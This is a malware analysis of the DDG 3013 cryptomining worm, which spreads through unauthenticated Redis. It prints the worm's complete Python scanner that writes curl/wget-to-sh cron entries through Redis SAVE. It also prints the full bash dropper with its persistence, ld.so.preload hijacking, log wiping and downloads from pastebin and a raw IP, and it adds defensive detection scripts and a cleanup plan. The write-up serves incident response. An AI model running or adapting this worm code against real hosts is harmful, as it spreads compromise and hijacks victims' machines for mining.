DDG 3013 Variant: A Brief Analysis of a Mining Worm Based on Unauthorized Redis Access
Preface
Limited by a lack of ELF analysis capability, the tracing of some of the logic still involves a degree of guesswork; this is for reference only.
Main text
How it started
Alibaba Cloud hosts raised several malicious command execution alerts, which were traced to the following commands
# Alert 1
python -c import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))
# Alert 2
/bin/sh -c /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh
Tracing the code behind alert 1 and alert 2 involves a large number of intermediate files (though many of them are just a base64 wrapper); after some simple sorting, three important files stand out.
1 https://pastebin.com/raw/nYBpuAxT (Python-based propagation that exploits unauthorized Redis access)
2 https://pastebin.com/raw/Gw7mywhC (adds assorted crontab entries on Linux and hijacks .so loading, to persist as reliably as possible)
3 i.sh (drops the ELF mining binary)
nYBpuAxT
Worm-style propagation, with a maximum of 20 threads.
It obtains the current host's public IP and uses it to build a list of IPs in the surrounding B-class (/16) ranges.
It then scans port 6379 on the other hosts in (slightly more than) the host's B-class range (655360 IPs in all).
Key attack payload
It uses Redis's configuration commands for the backup (RDB) file to write the planted content into /var/spool/cron/root.
This relies on cron to execute the command; */1 * * * * means the command runs once every minute.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.connect((self.host, 6379))
s.send('set backup1 "\\n\\n\\n*/1 * * * * curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
s.send('set backup2 "\\n\\n\\n*/1 * * * * wget -q -O- https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
s.send('config set dir /var/spool/cron\r\n')
s.send('config set dbfilename root\r\n')
s.send('save\r\n')
s.close()
Original full file https://pastebin.com/raw/nYBpuAxT
#! /usr/bin/env python
#coding: utf-8
import threading
import socket
from re import findall
import httplib

IP_LIST = []

class scanner(threading.Thread):
    tlist = []
    maxthreads = 20
    evnt = threading.Event()
    lck = threading.Lock()

    def __init__(self,host):
        threading.Thread.__init__(self)
        self.host = host

    def run(self):
        # one connection per target: plant the cron lines as keys, point the
        # RDB dump at /var/spool/cron/root, then SAVE
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(2)
            s.connect((self.host, 6379))
            s.send('set backup1 "\\n\\n\\n*/1 * * * * curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
            s.send('set backup2 "\\n\\n\\n*/1 * * * * wget -q -O- https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
            s.send('config set dir /var/spool/cron\r\n')
            s.send('config set dbfilename root\r\n')
            s.send('save\r\n')
            s.close()
        except Exception as e:
            pass
        scanner.lck.acquire()
        scanner.tlist.remove(self)
        if len(scanner.tlist) < scanner.maxthreads:
            scanner.evnt.set()
            scanner.evnt.clear()
        scanner.lck.release()

    def newthread(host):
        scanner.lck.acquire()
        sc = scanner(host)
        scanner.tlist.append(sc)
        scanner.lck.release()
        sc.start()
    newthread = staticmethod(newthread)

def get_ip_list():
    # look up the host's own public IP via ident.me and expand the
    # surrounding ranges into IP_LIST
    try:
        url = 'ident.me'
        conn = httplib.HTTPConnection(url, port=80, timeout=10)
        req = conn.request(method='GET', url='/', )
        result = conn.getresponse()
        ip2 = result.read()
        ips2 = findall(r'\d+.\d+.', ip2)[0][:-2]
        for u in range(0, 10):
            ip_list1 = (ips2 + (str(u)) +'.')
            for i in range(0, 256):
                ip_list2 = (ip_list1 + (str(i)))
                for g in range(0, 256):
                    IP_LIST.append(ip_list2 + '.' + (str(g)))
    except Exception:
        pass

def runPortscan():
    get_ip_list()
    for host in IP_LIST:
        scanner.lck.acquire()
        if len(scanner.tlist) >= scanner.maxthreads:
            scanner.lck.release()
            scanner.evnt.wait()
        else:
            scanner.lck.release()
            scanner.newthread(host)
    for t in scanner.tlist:
        t.join()

if __name__ == "__main__":
    runPortscan()
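As an added example that is not part of the original analysis, the following Python script detects the command sequence above in Redis MONITOR output: a client that points `dir` at a cron or .ssh directory and then issues SAVE. The MONITOR excerpt is constructed to mirror the worm's traffic, and the sensitive-directory list is an assumption to extend per environment.

```python
import re
from collections import defaultdict

# Directories where a Redis SAVE turns into code execution or credential planting:
# the cron paths the worm above targets, plus .ssh for the key-writing variant
# mentioned later in this write-up (this list is an assumption, extend as needed).
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron.d", "/.ssh")

# One MONITOR line looks like: <timestamp> [<db> <client addr>] "cmd" "arg" ...
MONITOR_RE = re.compile(r'^(\S+) \[(\d+) (\S+)\] (.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')   # quoted args, backslash escapes kept as-is

def parse_monitor_line(line):
    """Return (timestamp, client, [args]) or None for a line that is not MONITOR output."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return m.group(1), m.group(3), ARG_RE.findall(m.group(4))

def detect_cron_writes(lines):
    """Flag every client that pointed `dir` at a sensitive path and then issued SAVE/BGSAVE.

    Returns a list of (client, dir, dbfilename) tuples, one per completed sequence.
    """
    state = defaultdict(dict)   # latest CONFIG SET values seen per client connection
    hits = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[2]:
            continue
        _, client, args = parsed
        cmd = args[0].lower()
        if cmd == "config" and len(args) >= 4 and args[1].lower() == "set":
            state[client][args[2].lower()] = args[3]
        elif cmd in ("save", "bgsave"):
            d = state[client].get("dir", "")
            if any(s in d for s in SENSITIVE_DIRS):
                hits.append((client, d, state[client].get("dbfilename", "dump.rdb")))
    return hits

# Constructed MONITOR excerpt mirroring the worm's command sequence, plus a benign client.
SAMPLE = """\
1535600000.000001 [0 10.0.0.7:51234] "set" "backup1" "\\n\\n\\n*/1 * * * * curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"
1535600000.000002 [0 10.0.0.7:51234] "config" "set" "dir" "/var/spool/cron"
1535600000.000003 [0 10.0.0.7:51234] "config" "set" "dbfilename" "root"
1535600000.000004 [0 10.0.0.7:51234] "save"
1535600001.000001 [0 10.0.0.9:40000] "config" "set" "dir" "/var/lib/redis"
1535600001.000002 [0 10.0.0.9:40000] "save"
"""

if __name__ == "__main__":
    for client, d, name in detect_cron_writes(SAMPLE.splitlines()):
        print("ALERT: %s dumped the RDB file to %s/%s" % (client, d, name))
```

On a live instance the same function can be fed `redis-cli MONITOR` output line by line; note that MONITOR itself has a measurable cost on busy servers.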
Gw7mywhC
The core flow is as follows
update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/TzBeq3AM )
if [ ${update}x = "update"x ];then
    echocron
else
    if [ ! -f "/tmp/.tmph" ]; then
        rm -rf /tmp/.tmpg
        python
    fi
    kills
    downloadrun
    echocron
    system
    top
    sleep 10
    port=$(netstat -anp | grep :13531 | wc -l)
    if [ ${port} -eq 0 ];then
        downloadrunxm
    fi
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cron
fi
It first checks whether the component has an update; if so, it runs echocron to replace the corresponding dropped files.
The kills() function
1 Kills the processes of older versions of this trojan
2 Deletes grub deamon and disk_genius (possibly other disguised trojans)
3 Kills the processes of other mining programs
4 Deletes the files of other mining programs
5 Kills processes that have opened specific ports suspected of mining
The downloadrun() function (no ELF analysis capability; partly guesswork)
Sets up the daemon process for the mining trojan.
The echocron() function
Writes into various crontab directories so that it can revive itself.
The system() function
Downloads the mining trojan's key program and runs it.
Content of https://pastebin.com/raw/Fj2YdETv
# https://pastebin.com/raw/Fj2YdETv
(curl -fsSL https://pastebin.com/raw/JNPewK6r || wget -q -O- https://pastebin.com/raw/JNPewK6r)|base64 -d|/bin/bash
The top() function
Runs the mining trojan through shared-object hijacking (/etc/ld.so.preload), which is a stealthier way of executing it.
For details, refer to the following (from the Linux shared library guide cited in the references):
If you only want to override certain functions of a library file while keeping the rest, you can put the name of the overriding library file (a .so file) in /etc/ld.so.preload. These overriding libraries are loaded before the standard libraries; this is usually used for emergency
downloadrunxm() (no ELF analysis capability; partly guesswork)
Sets up the mining-pool configuration file /bin/config.json
Sets up the daemon process for the mining trojan.
Original full file https://pastebin.com/raw/Gw7mywhC
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function kills() {
    pkill -f sourplum
    pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
    rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
    rm -rf /tmp/*index_bak*
    rm -rf /tmp/*httpd.conf*
    rm -rf /tmp/*httpd.conf
    rm -rf /tmp/a7b104c270
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/var/tmp/java" | awk '{print $2}'|xargs kill -9
    pkill -f biosetjenkins
    pkill -f AnXqV.yam
    pkill -f xmrigDaemon
    pkill -f xmrigMiner
    pkill -f xmrig
    pkill -f Loopback
    pkill -f apaceha
    pkill -f cryptonight
    pkill -f stratum
    pkill -f mixnerdx
    pkill -f performedl
    pkill -f JnKihGjn
    pkill -f irqba2anc1
    pkill -f irqba5xnc1
    pkill -f irqbnc1
    pkill -f ir29xc1
    pkill -f conns
    pkill -f irqbalance
    pkill -f crypto-pool
    pkill -f minexmr
    pkill -f XJnRj
    pkill -f NXLAi
    pkill -f BI5zj
    pkill -f askdljlqw
    pkill -f minerd
    pkill -f minergate
    pkill -f Guard.sh
    pkill -f ysaydh
    pkill -f bonns
    pkill -f donns
    pkill -f kxjd
    pkill -f Duck.sh
    pkill -f bonn.sh
    pkill -f conn.sh
    pkill -f kworker34
    pkill -f kw.sh
    pkill -f pro.sh
    pkill -f polkitd
    pkill -f acpid
    pkill -f icb5o
    pkill -f nopxi
    pkill -f irqbalanc1
    pkill -f minerd
    pkill -f i586
    pkill -f gddr
    pkill -f mstxmr
    pkill -f ddg.2011
    pkill -f wnTKYg
    pkill -f deamon
    pkill -f disk_genius
    pkill -f sourplum
    pkill -f bashx
    pkill -f bashg
    pkill -f bashe
    pkill -f bashf
    pkill -f bashh
    pkill -f XbashY
    pkill -f libapache
    rm -rf /tmp/httpd.conf
    rm -rf /tmp/conn
    rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
    rm -rf /tmp/conns
    rm -f /tmp/irq.sh
    rm -f /tmp/irqbalanc1
    rm -f /tmp/irq
    rm -rf /tmp/kworkerds /bin/kworkerds /bin/config.json
    netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep 185.71.65.238 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    y=$(netstat -anp | grep kworkerds | wc -l)
    if [ ${y} -eq 0 ];then
        netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    fi
}

function system() {
    if [ ! -f "/bin/httpdns" ]; then
        curl -fsSL https://pastebin.com/raw/Fj2YdETv -o /bin/httpdns && chmod 755 /bin/httpdns
        if [ ! -f "/bin/httpdns" ]; then
            wgethttps://pastebin.com/raw/Fj2YdETv -O /bin/httpdns && chmod 755 /bin/httpdns
        fi
        if [ ! -f "/etc/crontab" ]; then
            echo -e "0 1 * * * root /bin/httpdns" >> /etc/crontab
        else
            sed -i '$d' /etc/crontab && echo -e "0 1 * * * root /bin/httpdns" >> /etc/crontab
        fi
    fi
}

function top() {
    mkdir -p /usr/local/lib/
    if [ ! -f "/usr/local/lib/libntp.so" ]; then
        curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
        if [ ! -f "/usr/local/lib/libntp.so" ]; then
            wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
        fi
    fi
    if [ ! -f "/etc/ld.so.preload" ]; then
        echo /usr/local/lib/libntp.so > /etc/ld.so.preload
    else
        sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >> /etc/ld.so.preload
    fi
    touch -acmr /bin/sh /etc/ld.so.preload
    touch -acmr /bin/sh /usr/local/lib/libntp.so
}

function python() {
    nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2VSa3JTUWZFJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
    touch /tmp/.tmph
}

function echocron() {
    echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\n##" > /etc/cron.d/root
    echo -e "*/17 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\n##" > /etc/cron.d/system
    echo -e "*/23 * * * *(curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\n##" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo -e "*/31 * * * *(curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\n##" > /var/spool/cron/crontabs/root
    mkdir -p /etc/cron.hourly
    curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.hourly/oanacron && chmod 755 /etc/cron.hourly/oanacron
    if [ ! -f "/etc/cron.hourly/oanacron" ]; then
        wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.hourly/oanacron && chmod 755 /etc/cron.hourly/oanacron
    fi
    mkdir -p /etc/cron.daily
    curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.daily/oanacron && chmod 755 /etc/cron.daily/oanacron
    if [ ! -f "/etc/cron.daily/oanacron" ]; then
        wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.daily/oanacron && chmod 755 /etc/cron.daily/oanacron
    fi
    mkdir -p /etc/cron.monthly
    curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.monthly/oanacron && chmod 755 /etc/cron.monthly/oanacron
    if [ ! -f "/etc/cron.monthly/oanacron" ]; then
        wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.monthly/oanacron && chmod 755 /etc/cron.monthly/oanacron
    fi
    touch -acmr /bin/sh /var/spool/cron/root
    touch -acmr /bin/sh /var/spool/cron/crontabs/root
    touch -acmr /bin/sh /etc/cron.d/system
    touch -acmr /bin/sh /etc/cron.d/root
    touch -acmr /bin/sh /etc/cron.hourly/oanacron
    touch -acmr /bin/sh /etc/cron.daily/oanacron
    touch -acmr /bin/sh /etc/cron.monthly/oanacron
}

function downloadrun() {
    ps=$(netstat -anp | grep :13531 | wc -l)
    if [ ${ps} -eq 0 ];then
        if [ ! -f "/tmp/kworkerds" ]; then
            curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod 777 /tmp/kworkerds
            if [ ! -f "/tmp/kworkerds" ]; then
                wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod 777 /tmp/kworkerds
            fi
            nohup /tmp/kworkerds >/dev/null 2>&1 &
        else
            nohup /tmp/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

function downloadrunxm() {
    pm=$(netstat -anp | grep :13531 | wc -l)
    if [ ${pm} -eq 0 ];then
        if [ ! -f "/bin/config.json" ]; then
            curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod 777 /bin/config.json
            if [ ! -f "/bin/config.json" ]; then
                wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod 777 /bin/config.json
            fi
        fi
        if [ ! -f "/bin/kworkerds" ]; then
            curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod 777 /bin/kworkerds
            if [ ! -f "/bin/kworkerds" ]; then
                wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod 777 /bin/kworkerds
            fi
            nohup /bin/kworkerds >/dev/null 2>&1 &
        else
            nohup /bin/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/TzBeq3AM )
if [ ${update}x = "update"x ];then
    echocron
else
    if [ ! -f "/tmp/.tmph" ]; then
        rm -rf /tmp/.tmpg
        python
    fi
    kills
    downloadrun
    echocron
    system
    top
    sleep 10
    port=$(netstat -anp | grep :13531 | wc -l)
    if [ ${port} -eq 0 ];then
        downloadrunxm
    fi
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cron
fi
#
#
#
i.sh
1 It first writes itself into /var/spool/cron/root and /var/spool/cron/crontabs/root, so that it keeps being re-executed.
*/15 * * * *: the execution frequency is once every 15 minutes.
2 Depending on the system architecture, it downloads the matching ELF mining trojan, ddgs.x86_64 or ddgs.i686, renames it to /tmp/ddgs.3013 and runs it.
3 Kills the processes of competing miners.
Original file http://149.56.106.215:8000/i.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
    wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
    curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
Attribution-related information: config.json
The malicious code fragment involved
wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
The content of config.json is as follows
{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "av": 0,
    "background": false,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": null,
    "donate-level": 0,
    "huge-pages": true,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 100,
    "pools": [
        {
            "url": "stratum+tcp://xmr.f2pool.com:13531",
            "user": "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "variant": 1
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": null,
    "user-agent": null,
    "watch": false
}
Summary
Worm characteristics
Noteworthy worm techniques
1 Uses /etc/ld.so.preload for a stealthy infection
2 Abuses a legitimate image-hosting service, http://thyrsi.com/t6/365/1535595427x-1404817712.jpg
3 Uses Pastebin to build an updatable malware family
Tips for incident response
1 When testing cleanup approaches, try them in a virtual machine/sandbox first.
2 Where the unauthorized Redis access vulnerability exists, the attacker is also very likely to write an SSH login key in order to log in remotely.
3 In addition, a machine with this vulnerability has a high chance of having its database wiped and held for ransom; see Alibaba Cloud's alert "Alert: database wiped and held for ransom, Redis ransomware outbreak" (reference 7).
Cleanup plan
1 Shut down the Redis service and set a password.
In redis.conf, find the "requirepass" field and fill in the password you want after it; Redis clients must then use this password to access the Redis service. Restart the Redis service and verify that the password takes effect.
Be sure to use a strong Redis password, because this trojan also has a simple brute-force capability to widen its spread.
2 Clean up the scheduled tasks (clean the cron entries first, then delete the miner binary, so that it cannot regenerate)
# Including but not limited to
/etc/crontab
/var/spool/cron/root
/var/spool/cron/crontabs/root
/etc/cron.d/system
/etc/cron.d/root
/etc/cron.hourly/oanacron
/etc/cron.daily/oanacron
/etc/cron.monthly/oanacron
3 Delete the related dynamic link libraries
# Including but not limited to
/etc/ld.so.preload
/etc/libjdk.so
/usr/local/lib/md.so
/usr/local/lib/screen.so
/usr/local/lib/y.so
4 Kill the mining processes and the DDG parent processes
ps -ef | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg|kworkerds' | awk '{print $2}' | xargs kill -9
5 Then delete the corresponding malicious programs, which live mainly in temporary directories. It is also advisable to search again with find/locate for keywords such as qW3xT, ddg*, wnTKYg and 2t3ik, and clean up as thoroughly as possible.
# Including but not limited to
/tmp/qW3xT
/tmp/ddgs.3013
/tmp/ddgs.3012
/tmp/wnTKYg
/tmp/2t3ik
/tmp/kworkerds
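The checks behind cleanup steps 2 to 4 above, and the /etc/ld.so.preload hijack performed by top(), as an added Python triage helper that is not part of the original post: it pulls download-and-pipe-to-shell lines out of a crontab (including a /var/spool/cron/root dumped by Redis with RDB bytes around the planted line), lists every ld.so.preload entry, and picks the PIDs matching the process names from step 4 out of ps -ef output. All sample inputs are constructed.

```python
import re

# Indicators taken from the scripts analysed above: cron lines that pipe a download
# straight into a shell, the Pastebin staging URLs, and the process names that
# the kill step of the cleanup plan targets.
DOWNLOAD_EXEC_RE = re.compile(r'\b(curl|wget)\b[^|\n]*\|\s*(sh|bash)\b')
PASTEBIN_RE = re.compile(r'pastebin\.com/raw/')
MALWARE_NAMES = ("wnTKYg", "2t3ik", "qW3xT.2", "ddg", "kworkerds")

def suspicious_cron_lines(text):
    """Return crontab lines that fetch a URL and pipe it into a shell.
    Also works on a /var/spool/cron/root written by the Redis SAVE trick: the
    RDB bytes around the planted line sit on other lines and never match."""
    hits = []
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#") and (
                DOWNLOAD_EXEC_RE.search(line) or PASTEBIN_RE.search(line)):
            hits.append(line)
    return hits

def preload_entries(text):
    """List the libraries named in /etc/ld.so.preload. On a clean host the file
    is normally absent or empty, so every entry deserves a look."""
    return [l.strip() for l in text.splitlines()
            if l.strip() and not l.strip().startswith("#")]

def malicious_pids(ps_lines):
    """Pick the PIDs out of `ps -ef` output whose command column contains one of
    MALWARE_NAMES (column 2 is the PID, everything from column 8 on is the command)."""
    pids = []
    for line in ps_lines:
        cols = line.split(None, 7)
        if len(cols) == 8 and cols[1].isdigit() and any(n in cols[7] for n in MALWARE_NAMES):
            pids.append(int(cols[1]))
    return pids

# Constructed samples: an RDB-style cron dump, a planted preload file and ps -ef output.
CRON_SAMPLE = ("REDIS0008\x00\xfa\tredis-ver\x00\n\n\n"
               "*/1 * * * * curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n\n\n"
               "\x00backup2\n0 3 * * * /usr/bin/logrotate\n")
PRELOAD_SAMPLE = "/usr/local/lib/libntp.so\n"
PS_SAMPLE = [
    "UID        PID  PPID  C STIME TTY          TIME CMD",
    "root         1     0  0 09:00 ?        00:00:01 /sbin/init",
    "root      4242     1 99 09:05 ?        01:12:33 /tmp/ddgs.3013",
    "root      4311  4242 98 09:05 ?        01:10:02 /bin/kworkerds",
    "root      5000     1  0 09:10 ?        00:00:00 /usr/sbin/sshd",
]

if __name__ == "__main__":
    print("cron:", suspicious_cron_lines(CRON_SAMPLE))
    print("ld.so.preload:", preload_entries(PRELOAD_SAMPLE))
    print("pids:", malicious_pids(PS_SAMPLE))
```

Run the functions over the real files and `ps -ef` output before killing anything, and remember the order the cleanup plan gives: cron entries and the preload library first, processes and binaries after.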
References
1 Threat alert: DDG version 3013 - 360 Netlab, http://blog.netlab.360.com/a-fast-ddg-3013-analyze/
2 Analysis report on the latest DDG mining variant - Sangfor, http://www.freebuf.com/articles/system/180385.html
3 Notes on an Alibaba Cloud server infected by minerd and kworkerds, https://blog.csdn.net/lang363/article/details/82354830
4 Notes from a Redis virus analysis, https://www.cnblogs.com/mondol/p/9592056.html
5 Alibaba Cloud CentOS server at 100% CPU for a long time, with the CPU-consuming process not findable via top, ps and similar commands?, https://www.zhihu.com/question/59820313
6 Linux shared library guide # How library files are used, http://liaoph.com/linux-shared-libary/
7 Alert: database wiped and held for ransom, Redis ransomware outbreak (WeChat article; link not preserved)